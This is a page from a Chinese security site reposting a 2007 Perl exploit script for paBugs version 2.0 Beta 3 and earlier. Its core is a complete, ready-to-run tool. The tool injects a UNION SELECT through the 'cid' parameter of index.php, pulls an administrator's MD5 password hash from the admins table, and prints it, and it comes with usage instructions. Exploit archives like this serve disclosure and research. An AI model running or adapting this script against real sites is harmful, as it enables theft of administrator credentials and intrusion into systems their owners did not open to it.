首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
paBugs <= 2.0 Beta 3 (main.php cid) Remote SQL Injection Exploit
来源:cf-team.net 作者:p-range 发布时间:2007-08-03  
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;

if(@ARGV < 4)
{
    usage();
    exit();
}

$host = $ARGV[0]; # Host
$path = $ARGV[1]; # Path to paBugs directory
$pref = $ARGV[2]; # prefix for admin tables
$usid = $ARGV[3]; # user id

$www = new LWP::UserAgent;
$sql = "$host/$path/index.php?cid=1'+union+select+1,2,3,password,5+from+$pref\_admins+where+id=$usid/*";
print "\n\n [~] Searching password for user(admin)=$usid \n";
$res = $www -> get($sql) or err();
$res -> content() =~ /([0-9,a-f]{32})/ or err();
print "\n [+] Admin Password(md5)=$usid is: $1 \n\n";

sub usage()
{
print "~---------------------------------------------------------~\n";
print "|                  Bug Found by: umpi                 |\n";
print "~---------------------------------------------------------~\n";
print "|    paBugs <= v2.0 Beta 3 Sql-Injection exploit          |\n";
print "| Usage: pabugs.pl [site] [folder] [prefix] [user_id] |\n";
print "| Example: pabugs.pl http://localhost /pabugs pa 1              |\n";
print "| Coded by p-range   // cf-team.net   // p-range.info     |\n";
print "~---------------------------------------------------------~\n";
}

sub err()
{
print "\n [-] Site is not vulnerable !";
exit();
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Live for Speed S1/S2/Demo (.mp
·CHILKAT ASP String (CkString.d
·MS Internet Explorer 6 DirectX
·Envolution <= 1.1.0 (topic) Re
·Yahoo! Widget < 4.0.5 GetCompo
·Panda Antivirus 2008 Local Pri
·Asterisk < 1.2.22, 1.4.8 IAX2
·Borland Interbase <= 2007 SP1
·Microsoft Visual 6 (VDT70.DLL
·corehttp 0.5.3alpha (httpd) Re
·Live for Speed S1/S2/Demo (.pl
·LinPHA <= 1.3.1 (new_images.ph
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved